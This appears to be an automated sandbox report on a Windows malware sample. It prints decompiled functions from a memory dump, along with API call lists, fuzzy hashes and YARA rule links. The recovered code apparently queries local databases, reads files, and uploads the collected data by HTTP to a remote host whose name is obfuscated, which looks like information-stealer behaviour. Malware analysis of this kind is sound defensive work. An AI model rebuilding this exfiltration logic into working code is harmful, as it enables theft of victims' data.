								_v1268 = _v1268 + 1;
								__eflags = _v1273;
							} while (_v1273 != 0);
							_v1280 = _v1268 - _v1272;
							_t656 = _v1280;
							__eflags =  *((char*)(_t760 + _t656 - 0x131)) - 0x2f;
							if( *((char*)(_t760 + _t656 - 0x131)) == 0x2f) {
								goto L21;
							}
							_v1284 = 1;
							goto L22;
						}
						return 0x10000;
					}
					return 0x50000;
				}
				return 0x40000;
			}

0x0041147b
0x0041148b
0x00411497
0x004114a1
0x004114a3
0x004114af
0x004114bf
0x004114c2
0x004114c4
0x004114c8
0x004114ca
0x004114ca
0x004114c8
0x004114d7
0x004114e3
0x004114ef
0x004114f5
0x004114fd
0x0041150f
0x0041151a
0x00411529
0x0041152f
0x0041152f
0x0041153f
0x00411541
0x00411553
0x00411559
0x00411562
0x00411564
0x00000000
0x00000000
0x0041156f
0x00411572
0x0041157a
0x0041157a
0x00411586
0x00411586
0x00411590
0x00411597
0x0041159e
0x004115a0
0x0041160c
0x0041160c
0x00411616
0x0041161c
0x0041161f
0x0041162a
0x0041162c
0x00411644
0x00411644
0x0041164b
0x0041164b
0x0041164f
0x00411665
0x00411669
0x00411683
0x00411687
0x004116a1
0x004116a5
0x00000000
0x004116b7
0x004116b2
0x004116c1
0x004116c1
0x004116c5
0x004116cf
0x004116d9
0x004116de
0x004116ea
0x004116f6
0x00411702
0x00411708
0x00411710
0x00411722
0x0041172d
0x0041173c
0x00411742
0x00411742
0x00411751
0x0041175d
0x0041175d
0x00411760
0x00411766
0x0041176e
0x00411774
0x0041177b
0x0041177b
0x00411790
0x0041179c
0x004117a6
0x004117a8
0x004117f7
0x004117f7
0x004117fd
0x00411803
0x0041180d
0x00411817
0x00411821
0x0041182b
0x00411835
0x0041183f
0x00411849
0x00411855
0x00411861
0x0041186d
0x0041187d
0x00411883
0x00411892
0x0041189f
0x004118a2
0x004118a8
0x004118aa
0x004118b1
0x004118b1
0x004118aa
0x004118bf
0x004118ca
0x004118d1
0x004118d5
0x004118fa
0x004118fa
0x00000000
0x004118d7
0x004118d7
0x004118dd
0x004118e1
0x00000000
0x00000000
0x004118f2
0x00411904
0x0041190a
0x00411919
0x00411921
0x00411931
0x00411949
0x00411955
0x0041195b
0x00411968
0x0041196e
0x00411978
0x0041197f
0x00411986
0x0041198d
0x00411994
0x004119a4
0x004119bd
0x004119d6
0x004119ef
0x004119fe
0x00411a17
0x00411a30
0x00411a49
0x00411a58
0x00411a71
0x00411a8a
0x00411aa3
0x00411aa9
0x00411aaf
0x00411ab7
0x00411abc
0x00411ac2
0x00411acb
0x00411ae2
0x00411ae7
0x00411aea
0x00411af0
0x00411af7
0x00411b2d
0x00411b30
0x00411b36
0x00411b3a
0x00411b5b
0x00411b68
0x00411b75
0x00411b84
0x00411b9b
0x00411b9b
0x00411ba2
0x00000000
0x00000000
0x00411bad
0x00411baf
0x00000000
0x00000000
0x00411bc5
0x00411bca
0x00411b92
0x00411b92
0x00411b95
0x00411b95
0x00411bd6
0x00411bd8
0x00411bda
0x00411be8
0x00411be8
0x00411beb
0x00411bf1
0x00411bf1
0x00411bf4
0x00411c0f
0x00411c0f
0x00411c16
0x00000000
0x00000000
0x00411c2c
0x00411c06
0x00411c06
0x00411c09
0x00411c09
0x00411c41
0x00411c44
0x00411c5f
0x00411c5f
0x00411c66
0x00000000
0x00000000
0x00411c7e
0x00411c83
0x00411c8c
0x00411c56
0x00411c56
0x00411c59
0x00411c59
0x00411c98
0x00411c9b
0x00411ca1
0x00411ca3
0x00411cb2
0x00411cb7
0x00411cc3
0x00411cc3
0x00411ccc
0x00411ccc
0x00411ca3
0x00411ccf
0x00411cdc
0x00411cdf
0x00411cf5
0x00411cf5
0x00000000
0x00411ce1
0x00411ce5
0x00411ce7
0x00000000
0x00000000
0x00411ce9
0x00411cff
0x00411d0b
0x00411d12
0x00411d14
0x00411d33
0x00411d37
0x00411d39
0x00411d51
0x00411d55
0x00411d57
0x00411d5f
0x00411d5f
0x00411d69
0x00411d6f
0x00411d79
0x00411d99
0x00411d9c
0x00411da2
0x00411da6
0x00411db6
0x00411dba
0x00411dda
0x00411de3
0x00411df2
0x00411e0a
0x00411e19
0x00411e1f
0x00411e29
0x00411e2b
0x00411f09
0x00411f14
0x00411f16
0x00411f22
0x00411f26
0x00411f3d
0x00411f58
0x00411f5e
0x00411f65
0x00411f7a
0x00411f7a
0x00411f83
0x00411f8d
0x00411f94
0x00411f94
0x00411f9a
0x00411f9e
0x00411fbd
0x00411fc9
0x00411fe4
0x00411ff2
0x00412005
0x00412011
0x00412028
0x0041202a
0x00412030
0x00412034
0x00412050
0x00412056
0x00412056
0x0041205c
0x00412063
0x00000000
0x00000000
0x00412071
0x00412071
0x00412085
0x0041208b
0x0041208b
0x00000000
0x0041208b
0x00412042
0x00000000
0x00412042
0x00000000
0x00411fa6
0x00000000
0x00411f67
0x00411f2f
0x00411f31
0x00000000
0x00000000
0x00000000
0x00411f33
0x00000000
0x00411f18
0x00411e37
0x00411e3a
0x00411e48
0x00411e4c
0x00411e5a
0x00411e5d
0x00411e66
0x00411e66
0x00411e69
0x00411e69
0x00411e77
0x00411e94
0x00411e9c
0x00411e9e
0x00411ec5
0x00411ecb
0x00411ed2
0x00411eee
0x00411ef6
0x00411ef8
0x00000000
0x00411f04
0x00000000
0x00411efa
0x00000000
0x00411ea0
0x00000000
0x00411ea0
0x00411e9e
0x00411e40
0x00411e42
0x00000000
0x00000000
0x00000000
0x00411e42
0x00000000
0x00411dbc
0x00000000
0x00411dae
0x00411d3b
0x00411d3f
0x00000000
0x00000000
0x00411d4c
0x00000000
0x00411d4c
0x00411d16
0x00411d1a
0x00000000
0x00000000
0x00411d29
0x00411d2e
0x00000000
0x00411d2e
0x00411cdf
0x00411b42
0x00000000
0x00411b4d
0x00411aff
0x00000000
0x00411b04
0x004118d5
0x004117b0
0x004117b0
0x004117b3
0x004117b9
0x004117c2
0x004117c8
0x004117cf
0x004117cf
0x004117de
0x004117e5
0x004117ee
0x004117ee
0x004117f1
0x00000000
0x004117f1
0x00000000
0x004116c7
0x0041169c
0x00000000
0x0041169c
0x0041167e
0x00000000
0x0041167e
0x00411660
0x00000000
0x00411660
0x00411635
0x0041163a
0x00411640
0x00411642
0x00000000
0x00000000
0x00000000
0x00411642
0x004115a8
0x004115b4
0x004115b4
0x004115b7
0x004115bd
0x004115c5
0x004115cb
0x004115d2
0x004115d2
0x004115e7
0x004115ed
0x004115fb
0x004115fe
0x00000000
0x00000000
0x00411600
0x00000000
0x00411600
0x00000000
0x00411543
0x00000000
0x004114a5
0x00000000

Strings

U, xrefs: 00411978
M#A, xrefs: 004116C7
T, xrefs: 0041197F

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: M#A$T$U
API String ID: 0-4061607806
Opcode ID: a7ec7e8c33c2a9a80c3ecdacdfeed97e49043445914db118b3330ff57c3e0498
Instruction ID: ae10aa6f877a798cc04fcb2c25d335a8d94a856d11d224f0b5b65bf9efafed68
Opcode Fuzzy Hash: a7ec7e8c33c2a9a80c3ecdacdfeed97e49043445914db118b3330ff57c3e0498
Instruction Fuzzy Hash: 15722AB49052698FDB24CF14C890BEABBB1BF49304F1481DAD609A7352D7389EC5CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00406ED0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00406ED0(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a24) {
				char _v268;
				char _v272;
				char _v276;
				void* _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				CHAR* _t30;
				void* _t33;
				void* _t35;
				void* _t38;
				void* _t40;
				void* _t41;
				void* _t42;
				intOrPtr _t48;
				intOrPtr _t67;
				void* _t73;
				void* _t75;
				void* _t76;
				void* _t79;

				E0040A270( &_v268, 0x104);
				_t30 =  *0x417408; // 0xbb9650
				wsprintfA( &_v268, _t30, _a12, _a8);
				_t33 =  *0x417820(_a4,  &_v272); // executed
				_t75 = _t73 + 0x18;
				if(_t33 == 0) {
					_t67 =  *0x4176dc; // 0xbc00d0
					_t35 =  *0x4177d8(_v272, _t67, 0xffffffff,  &_v276, 0); // executed
					_t76 = _t75 + 0x14;
					if(_t35 != 0) {
						L6:
						 *0x4177f8(_v276);
						_t38 =  *0x417824(_v272); // executed
						return _t38;
					}
					_t40 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f); // executed
					_v280 = _t40;
					while(1) {
						_t41 =  *0x4177f4(_v276);
						_t79 = _t76 + 4;
						if(_t41 != 0x64) {
							break;
						}
						_v288 =  *0x417810(_v276, 0);
						_t48 =  *0x417810(_v276, 1);
						_t76 = _t79 + 0x10;
						_v284 = _t48;
						 *0x4179f8(_v280, _v288);
						 *0x4179f8(_v280, "\t");
						 *0x4179f8(_v280, _v284);
						 *0x4179f8(_v280, "\n");
					}
					_t42 =  *0x4178e4(_v280);
					_t24 =  &_a24; // 0x407772
					E00412380( *_t24,  &_v268, _v280, _t42);
					_t76 = _t79 + 0x10;
					E0040A270( &_v280, 4);
					goto L6;
				}
				return _t33;
			}

0x00406ee5
0x00406ef2
0x00406eff
0x00406f13
0x00406f19
0x00406f1e
0x00406f2f
0x00406f3d
0x00406f43
0x00406f48
0x00407038
0x0040703f
0x0040704f
0x00000000
0x00407055
0x00406f5c
0x00406f62
0x00406f68
0x00406f6f
0x00406f75
0x00406f7b
0x00000000
0x00000000
0x00406f93
0x00406fa2
0x00406fa8
0x00406fab
0x00406fbf
0x00406fd1
0x00406fe5
0x00406ff7
0x00406ff7
0x00407009
0x0040701e
0x00407022
0x00407027
0x00407033
0x00000000
0x00407033
0x0040705b

APIs

wsprintfA.USER32 ref: 00406EFF
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406F55
RtlAllocateHeap.NTDLL(00000000), ref: 00406F5C
lstrcat.KERNEL32(?,?), ref: 00406FBF
lstrcat.KERNEL32(?,00416BB4), ref: 00406FD1
lstrcat.KERNEL32(?,?), ref: 00406FE5
lstrcat.KERNEL32(?,004165A0), ref: 00406FF7
lstrlen.KERNEL32(?), ref: 00407009

Strings

rw@, xrefs: 0040701E, 00407021

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$Heap$AllocateProcesslstrlenwsprintf
String ID: rw@
API String ID: 3196222039-3197553549
Opcode ID: cb4a8e05654736c049735c890642006a7531090ca89adf7dace3e4e04412de48
Instruction ID: 922ee3d97386ea9a619821ae320146fc7eff6e1d9dd1d4ab35b3db8475ae464a
Opcode Fuzzy Hash: cb4a8e05654736c049735c890642006a7531090ca89adf7dace3e4e04412de48
Instruction Fuzzy Hash: E041B7B1D04118ABCB14EBA4DC4AEDA7778AF08700F0085E8F719D7280D675AA94CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004073D0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E004073D0(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a24) {
				char _v8;
				char _v276;
				char _v280;
				void* _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				CHAR* _t30;
				void* _t33;
				void* _t35;
				void* _t38;
				void* _t40;
				void* _t41;
				void* _t42;
				intOrPtr _t48;
				intOrPtr _t67;
				void* _t73;
				void* _t75;
				void* _t76;
				void* _t79;

				E0040A270( &_v276, 0x104);
				_t30 =  *0x417414; // 0xbb9690
				wsprintfA( &_v276, _t30, _a12, _a8);
				_t33 =  *0x417820(_a4,  &_v8); // executed
				_t75 = _t73 + 0x18;
				if(_t33 == 0) {
					_t67 =  *0x417780; // 0xbab550
					_t35 =  *0x4177d8(_v8, _t67, 0xffffffff,  &_v280, 0);
					_t76 = _t75 + 0x14;
					if(_t35 != 0) {
						L6:
						 *0x4177f8(_v280);
						_t38 =  *0x417824(_v8); // executed
						return _t38;
					}
					_t40 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f); // executed
					_v284 = _t40;
					while(1) {
						_t41 =  *0x4177f4(_v280);
						_t79 = _t76 + 4;
						if(_t41 != 0x64) {
							break;
						}
						_v288 =  *0x417810(_v280, 0);
						_t48 =  *0x417810(_v280, 1);
						_t76 = _t79 + 0x10;
						_v292 = _t48;
						 *0x4179f8(_v284, _v288);
						 *0x4179f8(_v284, "\n");
						 *0x4179f8(_v284, _v292);
						 *0x4179f8(_v284, "\n\n");
					}
					_t42 =  *0x4178e4(_v284);
					_t24 =  &_a24; // 0x40786e
					E00412380( *_t24,  &_v276, _v284, _t42);
					_t76 = _t79 + 0x10;
					E0040A270( &_v284, 4);
					goto L6;
				}
				return _t33;
			}

0x004073e5
0x004073f2
0x004073ff
0x00407410
0x00407416
0x0040741b
0x0040742c
0x00407437
0x0040743d
0x00407442
0x00407532
0x00407539
0x00407546
0x00000000
0x0040754c
0x00407456
0x0040745c
0x00407462
0x00407469
0x0040746f
0x00407475
0x00000000
0x00000000
0x0040748d
0x0040749c
0x004074a2
0x004074a5
0x004074b9
0x004074cb
0x004074df
0x004074f1
0x004074f1
0x00407503
0x00407518
0x0040751c
0x00407521
0x0040752d
0x00000000
0x0040752d
0x00407552

APIs

wsprintfA.USER32 ref: 004073FF
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040744F
RtlAllocateHeap.NTDLL(00000000), ref: 00407456
lstrcat.KERNEL32(?,?), ref: 004074B9
lstrcat.KERNEL32(?,004165A0), ref: 004074CB
lstrcat.KERNEL32(?,?), ref: 004074DF
lstrcat.KERNEL32(?,0041659C), ref: 004074F1
lstrlen.KERNEL32(?), ref: 00407503

Strings

nx@, xrefs: 00407518, 0040751B

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$Heap$AllocateProcesslstrlenwsprintf
String ID: nx@
API String ID: 3196222039-741510486
Opcode ID: 6bb62a21462bbb5db17184c5fe7397f6be845714ef128292b0deb07b5b5ee790
Instruction ID: c30c30779185a234e5efaa1404f7b0d6672a356d7c57256d758847ad9ef445cd
Opcode Fuzzy Hash: 6bb62a21462bbb5db17184c5fe7397f6be845714ef128292b0deb07b5b5ee790
Instruction Fuzzy Hash: 5741A7B1904118ABCB14EFA4DC4AEDA7778BF48700F0085E8F719D7291D635EA90CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405330, Relevance: 13.7, APIs: 9, Instructions: 159
stringCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00405330() {
				char _v5004;
				char _v10004;
				char _v10268;
				char _v10272;
				char _v10276;
				char _v10540;
				char _v10544;
				char _t37;
				intOrPtr _t46;
				intOrPtr _t51;
				char* _t60;
				intOrPtr _t70;
				void* _t71;
				void* _t74;
				void* _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				void* _t92;
				intOrPtr _t97;
				intOrPtr _t102;
				char* _t106;
				void* _t127;

				E00412560(0x292c, _t85);
				_t37 = E004122D0(0, 0x6400000, 0); // executed
				_v10544 = _t37;
				E0040A270( &_v10268, 0x104);
				E0040A270( &_v5004, 0x1388);
				E0040A270( &_v10540, 0x104);
				 *0x4179f8( &_v10268, E0040A400( &_v5004, _t127, 8));
				_t87 =  *0x41725c; // 0xba2f10
				 *0x4179f8( &_v10268, _t87);
				_t46 =  *0x417364; // 0xba5250
				 *0x4179f8( &_v10540, _t46);
				_t102 =  *0x4177b4; // 0xbac128
				 *0x4179f8( &_v10540, _t102);
				_t89 =  *0x41775c; // 0xba4e70
				 *0x4179f8( &_v10540, _t89);
				_t51 =  *0x417694; // 0xba4e90
				E00403D30( &_v10540, _t51); // executed
				E0040A270( &_v10540, 0x104);
				E00409390(_t127, _v10544); // executed
				E004013E0(_v10544); // executed
				E00404760(_v10544, _t127, _v10544); // executed
				E0040A840(_t127, 0x50, _v10544); // executed
				_t92 =  *0x417704; // 0xbb2e20
				_t106 =  *0x417284; // 0xbac218
				_t60 =  *0x4177b4; // 0xbac128
				 *0x4179f8( &_v5004, E00404320(_t92, _t60, _t106, _t92));
				E00405110( &_v5004, _t127,  &_v5004, _v10544);
				E0040A270( &_v5004, 0x1388);
				E004123A0(_v10544,  &_v10276,  &_v10272);
				E0040A270( &_v10004, 0x1388);
				_t70 =  *0x417284; // 0xbac218
				_t97 =  *0x4177b4; // 0xbac128
				_t71 = E00403E70(_t97, _t127, _t97, _t70,  &_v10268, _v10276, _v10272); // executed
				 *0x4179f8( &_v10004, _t71);
				_t74 =  *0x4178e4( &_v10004);
				_t128 = _t74 - 5;
				if(_t74 > 5) {
					E00404B80(_t128,  &_v10004);
				}
				E0040A270( &_v10268, 0x104);
				E0040A270( &_v10004, 0x1388);
				E0040A270( &_v10276, 4);
				E0040A270( &_v10272, 4);
				E0040A270( &_v10544, 4); // executed
				E00404D70(); // executed
				E0040ACF0( &_v10276); // executed
				ExitProcess(0);
			}

0x00405338
0x00405346
0x0040534e
0x00405360
0x00405371
0x00405382
0x00405399
0x0040539f
0x004053ad
0x004053b3
0x004053c0
0x004053c6
0x004053d4
0x004053da
0x004053e8
0x004053ee
0x004053fb
0x0040540f
0x0040541b
0x0040542a
0x00405439
0x0040544a
0x00405452
0x00405459
0x00405460
0x00405476
0x0040548a
0x0040549e
0x004054b8
0x004054cc
0x004054e6
0x004054ec
0x004054f3
0x00405503
0x00405510
0x00405516
0x00405519
0x00405522
0x00405527
0x00405536
0x00405547
0x00405555
0x00405563
0x00405571
0x00405576
0x0040557b
0x00405582

APIs

Part of subcall function 0040A400: GetSystemTime.KERNEL32(?,?,00000104), ref: 0040A421

lstrcat.KERNEL32(?,00000000), ref: 00405399
lstrcat.KERNEL32(?,00BA2F10), ref: 004053AD
lstrcat.KERNEL32(?,00BA5250), ref: 004053C0
lstrcat.KERNEL32(?,00BAC128), ref: 004053D4
lstrcat.KERNEL32(?,00BA4E70), ref: 004053E8

Part of subcall function 00403D30: InternetOpenA.WININET(00413042,00000001,00000000,00000000,00000000), ref: 00403D4D

Part of subcall function 00409390: GetProcessHeap.KERNEL32(00000000,000F423F,?,00405420,?,?,00000104), ref: 0040939A
Part of subcall function 00409390: RtlAllocateHeap.NTDLL(00000000,?,00405420), ref: 004093A1

Part of subcall function 00404760: GetProcessHeap.KERNEL32(00000000,000F423F,?,?,0040543E,?,?,00000104), ref: 0040476B
Part of subcall function 00404760: RtlAllocateHeap.NTDLL(00000000), ref: 00404772
Part of subcall function 00404760: lstrcat.KERNEL32(?,00BA0570), ref: 00404785
Part of subcall function 00404760: lstrcat.KERNEL32(?,00BA5048), ref: 00404796
Part of subcall function 00404760: lstrcat.KERNEL32(?,0041659C), ref: 004047A5
Part of subcall function 00404760: lstrcat.KERNEL32(?,00BA0580), ref: 004047B6
Part of subcall function 00404760: lstrcat.KERNEL32(?,004165A0), ref: 004047C5
Part of subcall function 00404760: lstrcat.KERNEL32(?,00BAE3D8), ref: 004047D6
Part of subcall function 00404760: lstrcat.KERNEL32(?,0041659C), ref: 004047E5
Part of subcall function 00404760: lstrcat.KERNEL32(?,00BAC098), ref: 004047F6
Part of subcall function 00404760: GetCurrentProcessId.KERNEL32(?,?,0040543E,?,?,00000104), ref: 004047FC
Part of subcall function 00404760: lstrcat.KERNEL32(?,00000000), ref: 00404810
Part of subcall function 00404760: lstrcat.KERNEL32(0041659C,0041659C), ref: 0040481F
Part of subcall function 00404760: lstrcat.KERNEL32(00BAC158,00BAC158), ref: 0040482F
Part of subcall function 00404760: lstrcat.KERNEL32(00000000,00000000), ref: 0040483F
Part of subcall function 00404760: lstrcat.KERNEL32(004165A0,004165A0), ref: 0040484E
Part of subcall function 00404760: lstrcat.KERNEL32(00BAC1B8,00BAC1B8), ref: 0040485F
Part of subcall function 00404760: lstrcat.KERNEL32(00000000,00000000), ref: 0040486F
Part of subcall function 00404760: lstrcat.KERNEL32(0041659C,0041659C), ref: 0040487E
Part of subcall function 00404760: lstrcat.KERNEL32(00BAE158,00BAE158), ref: 0040488F
Part of subcall function 00404760: lstrcat.KERNEL32(00000000,00000000), ref: 0040489F
Part of subcall function 00404760: lstrcat.KERNEL32(004165A0,004165A0), ref: 004048AE

Part of subcall function 00404320: InternetOpenA.WININET(00413042,00000000,00000000,00000000,00000000), ref: 00404349
Part of subcall function 00404320: InternetSetOptionA.WININET(00000000,00000006,000927C0,00000004), ref: 0040437E
Part of subcall function 00404320: InternetConnectA.WININET(00000000,00BAC218,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0040439B
Part of subcall function 00404320: HttpOpenRequestA.WININET(00000000,0040546B,00BAC128,00000000,00000000,00000000,00400000,00000000), ref: 004043D0
Part of subcall function 00404320: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004043F4
Part of subcall function 00404320: InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404418
Part of subcall function 00404320: InternetCloseHandle.WININET(00000000), ref: 00404463
Part of subcall function 00404320: InternetCloseHandle.WININET(00000000), ref: 00404470
Part of subcall function 00404320: InternetCloseHandle.WININET(00000000), ref: 0040447D

lstrcat.KERNEL32(?,00000000), ref: 00405476

Part of subcall function 00405110: lstrcat.KERNEL32(?,?), ref: 0040516C
Part of subcall function 00405110: strtok.MSVCRT ref: 0040517E

Part of subcall function 00403E70: GetProcessHeap.KERNEL32(00000000,00800000,?,000001F4,?,00000000,00001388,?,?,004054F8,00BAC128,00BAC218,?,?,?,?), ref: 00403EA9
Part of subcall function 00403E70: RtlAllocateHeap.NTDLL(00000000), ref: 00403EB0
Part of subcall function 00403E70: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403ED7
Part of subcall function 00403E70: InternetSetOptionA.WININET(?,00000002,000927C0,00000004), ref: 00403EF9
Part of subcall function 00403E70: lstrcat.KERNEL32(?,00000000), ref: 00403F1E
Part of subcall function 00403E70: lstrcat.KERNEL32(?,00416578), ref: 00403F30
Part of subcall function 00403E70: lstrcat.KERNEL32(?,------), ref: 00403F42
Part of subcall function 00403E70: lstrcat.KERNEL32(?,?), ref: 00403F56
Part of subcall function 00403E70: lstrcat.KERNEL32(?,00416584), ref: 00403F68
Part of subcall function 00403E70: lstrcat.KERNEL32(?,00416578), ref: 00403F7A
Part of subcall function 00403E70: lstrcat.KERNEL32(?,00BA4B50), ref: 00403F8D
Part of subcall function 00403E70: lstrcat.KERNEL32(?,?), ref: 00403FA1
Part of subcall function 00403E70: InternetConnectA.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00403FBE

lstrcat.KERNEL32(?,00000000), ref: 00405503
lstrlen.KERNEL32(?,?,?,?,?,00001388,?,?,00001388), ref: 00405510
ExitProcess.KERNEL32 ref: 00405582

Part of subcall function 00404B80: strtok.MSVCRT ref: 00404B92
Part of subcall function 00404B80: lstrcat.KERNEL32(?,00000000), ref: 00404C1F
Part of subcall function 00404B80: strtok.MSVCRT ref: 00404D44

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$Internet$Heap$Process$Open$AllocateCloseHandlestrtok$ConnectHttpOptionRequest$CurrentExitFileReadSendSystemTimelstrlen
String ID:
API String ID: 3551367961-0
Opcode ID: 434c4fa6af8cafda593c5e1e299351306b0f80014f3a2492da160f373a1f4445
Instruction ID: 6e57fbb7ef4c5632b527d8e525f4262ddf8711d352cc17205538097d6e700fde
Opcode Fuzzy Hash: 434c4fa6af8cafda593c5e1e299351306b0f80014f3a2492da160f373a1f4445
Instruction Fuzzy Hash: A45177F6904314A7DB10E7A0DC86DDE737CAB48704F0085FEF609A61C1DA75AB988F69

Uniqueness

Uniqueness Score: -1.00%

Function 00407290, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00407290(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a24) {
				char _v8;
				char _v276;
				char _v280;
				void* _v284;
				intOrPtr _v288;
				CHAR* _t25;
				void* _t28;
				void* _t30;
				void* _t33;
				void* _t35;
				void* _t36;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t56;
				void* _t61;
				void* _t63;
				void* _t64;
				void* _t67;

				E0040A270( &_v276, 0x104);
				_t25 =  *0x41707c; // 0xbb9490
				wsprintfA( &_v276, _t25, _a12, _a8);
				_t28 =  *0x417820(_a4,  &_v8); // executed
				_t63 = _t61 + 0x18;
				if(_t28 == 0) {
					_t56 =  *0x41742c; // 0xbb9430
					_t30 =  *0x4177d8(_v8, _t56, 0xffffffff,  &_v280, 0); // executed
					_t64 = _t63 + 0x14;
					if(_t30 != 0) {
						L6:
						 *0x4177f8(_v280);
						_t33 =  *0x417824(_v8); // executed
						return _t33;
					}
					_t35 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f); // executed
					_v284 = _t35;
					while(1) {
						_t36 =  *0x4177f4(_v280); // executed
						_t67 = _t64 + 4;
						if(_t36 != 0x64) {
							break;
						}
						_t42 =  *0x417810(_v280, 0);
						_t64 = _t67 + 8;
						_v288 = _t42;
						 *0x4179f8(_v284, _v288);
						 *0x4179f8(_v284, "\n");
					}
					_t38 =  *0x4178e4(_v284);
					_t19 =  &_a24; // 0x40784b
					E00412380( *_t19,  &_v276, _v284, _t38);
					_t64 = _t67 + 0x10;
					E0040A270( &_v284, 4);
					goto L6;
				}
				return _t28;
			}

0x004072a5
0x004072b2
0x004072bf
0x004072d0
0x004072d6
0x004072db
0x004072ec
0x004072f7
0x004072fd
0x00407302
0x004073ad
0x004073b4
0x004073c1
0x00000000
0x004073c7
0x00407316
0x0040731c
0x00407322
0x00407329
0x0040732f
0x00407335
0x00000000
0x00000000
0x00407340
0x00407346
0x00407349
0x0040735d
0x0040736f
0x0040736f
0x0040737e
0x00407393
0x00407397
0x0040739c
0x004073a8
0x00000000
0x004073a8
0x004073cd

APIs

wsprintfA.USER32 ref: 004072BF
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040730F
RtlAllocateHeap.NTDLL(00000000), ref: 00407316
lstrcat.KERNEL32(?,?), ref: 0040735D
lstrcat.KERNEL32(?,004165A0), ref: 0040736F
lstrlen.KERNEL32(?), ref: 0040737E

Strings

Kx@, xrefs: 00407393, 00407396

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heaplstrcat$AllocateProcesslstrlenwsprintf
String ID: Kx@
API String ID: 2177231248-313788765
Opcode ID: d1812fb277aa5778c01ca423334f0363556793ed2402d7e4dc553834d1a2eab3
Instruction ID: 61cf1bc0aa4e67df8cbef66d4ab991f206dda4d9dccd49add7f96fc778df9b27
Opcode Fuzzy Hash: d1812fb277aa5778c01ca423334f0363556793ed2402d7e4dc553834d1a2eab3
Instruction Fuzzy Hash: B93196B190420CABDB14EBA4DC4AEDB7778AF08700F0085A4F719D7290D635EA54CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406140, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 77
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00406140(CHAR* _a4, void** _a8, long* _a12) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				intOrPtr _v24;
				char _v28;
				long _v32;
				void* _t30;
				void* _t36;
				int _t39;

				_v8 = 0;
				_v16 = 0;
				_t30 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v16 = _t30;
				if(_v16 == 0 || _v16 == 0xffffffff) {
					L12:
					return _v8;
				} else {
					_t7 =  &_v28; // 0x406470
					_push(_v16);
					if( *0x417854() != 0 && _v24 == 0) {
						_t11 =  &_v28; // 0x406470
						 *_a12 =  *_t11;
						_t36 = LocalAlloc(0x40,  *_a12); // executed
						 *_a8 = _t36;
						if( *_a8 != 0) {
							_t39 = ReadFile(_v16,  *_a8,  *_a12,  &_v12, 0); // executed
							if(_t39 == 0 ||  *_a12 != _v12) {
								_v32 = 0;
							} else {
								_v32 = 1;
							}
							_v8 = _v32;
							if(_v8 == 0) {
								LocalFree( *_a8);
							}
						}
					}
					FindCloseChangeNotification(_v16); // executed
					goto L12;
				}
			}

0x00406146
0x0040614d
0x00406167
0x0040616d
0x00406174
0x0040621b
0x00406221
0x00406184
0x00406184
0x0040618b
0x00406194
0x0040619f
0x004061a2
0x004061ac
0x004061b5
0x004061bd
0x004061d5
0x004061dd
0x004061f2
0x004061e9
0x004061e9
0x004061e9
0x004061fc
0x00406203
0x0040620b
0x0040620b
0x00406203
0x004061bd
0x00406215
0x00000000
0x00406215

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00406470,00000000,?), ref: 00406167
GetFileSizeEx.KERNEL32(000000FF,pd@,?,00406470,00000000,?), ref: 0040618C
LocalAlloc.KERNEL32(00000040,?,?,00406470), ref: 004061AC
ReadFile.KERNEL32(000000FF,?,000000FF,?,00000000,?,00406470), ref: 004061D5
LocalFree.KERNEL32(?), ref: 0040620B
FindCloseChangeNotification.KERNEL32(000000FF,?,00406470,00000000,?), ref: 00406215

Strings

pd@, xrefs: 00406184, 0040619F, 00406187

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID: pd@
API String ID: 1815715184-3707592305
